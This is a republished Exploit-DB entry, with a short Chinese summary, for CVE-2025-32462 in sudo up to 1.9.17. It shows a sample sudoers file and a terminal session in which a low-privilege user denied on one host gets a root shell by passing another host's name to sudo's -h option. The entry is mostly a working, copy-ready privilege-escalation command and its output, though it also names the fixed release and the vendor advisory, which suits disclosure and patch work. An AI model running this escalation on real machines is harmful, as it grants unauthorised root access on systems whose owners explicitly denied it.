[local] Sudo 1.9.17 Host Option - Elevation of Privilege
Sudo 1.9.17存在权限提升漏洞(CVE-2025-32462),通过指定远程主机选项可绕过本地限制并获取root权限。该问题已修复于版本1.9.17p1。 2025-7-8 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:7 收藏
Sudo 1.9.17存在权限提升漏洞(CVE-2025-32462),通过指定远程主机选项可绕过本地限制并获取root权限。该问题已修复于版本1.9.17p1。 2025-7-8 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:7 收藏
# Exploit Title: Sudo 1.9.17 Host Option - Elevation of Privilege
# Date: 2025-06-30
# Exploit Author: Rich Mirch
# Vendor Homepage: https://www.sudo.ws
# Software Link: https://www.sudo.ws/dist/sudo-1.9.17.tar.gz
# Version: Stable 1.9.0 - 1.9.17, Legacy 1.8.8 - 1.8.32
# Fixed in: 1.9.17p1
# Vendor Advisory: https://www.sudo.ws/security/advisories/host_any
# Blog:
https://www.stratascale.com/vulnerability-alert-CVE-2025-32462-sudo-host
# Tested on: Ubuntu 24.04.1; Sudo 1.9.15p5, macOS Sequoia 15.3.2; Sudo
1.9.13p2
# CVE : CVE-2025-32462
#
No exploit is required. Executing a sudo or sudoedit command with the host
option referencing an unrelated remote host rule causes Sudo to treat the
rule as valid for the local system. As a result, any command allowed by the
remote host rule can be executed on the local machine.
Example /etc/sudoers file using the Host_Alias directive. The lowpriv user
is allowed to execute all commands (full root) on dev.test.local,
ci.test.local, but not prod.test.local.
Host_Alias SERVERS = prod.test.local, dev.test.local
Host_Alias PROD = prod.test.local
lowpriv SERVERS, !PROD = NOPASSWD:ALL
lowpriv ci.test.local = NOPASSWD:ALL
Even though the prod.test.local server is explicitly denied for the lowpriv
user, root access is achieved by specifying the host option for the
dev.test.local or ci.test.local servers.
Example
Show that lowpriv is not allowed to execute sudo on the prod server.
lowpriv@prod:~$ id
uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)
lowpriv@prod:~$ sudo -l
[sudo] password for lowpriv:
Sorry, user lowpriv may not run sudo on prod.
List the host rules for the dev.test.local server.
lowpriv@prod:~$ sudo -l -h dev.test.local
Matching Defaults entries for lowpriv on dev:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User lowpriv may run the following commands on dev:
(root) NOPASSWD: ALL
Execute a root shell on prod.test.local by specifying the -h dev.test.local
option.
lowpriv@prod:~$ sudo -h dev.test.local -i
sudo: a remote host may only be specified when listing privileges.
root@prod:~# id
uid=0(root) gid=0(root) groups=0(root)
文章来源: https://www.exploit-db.com/exploits/52354
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh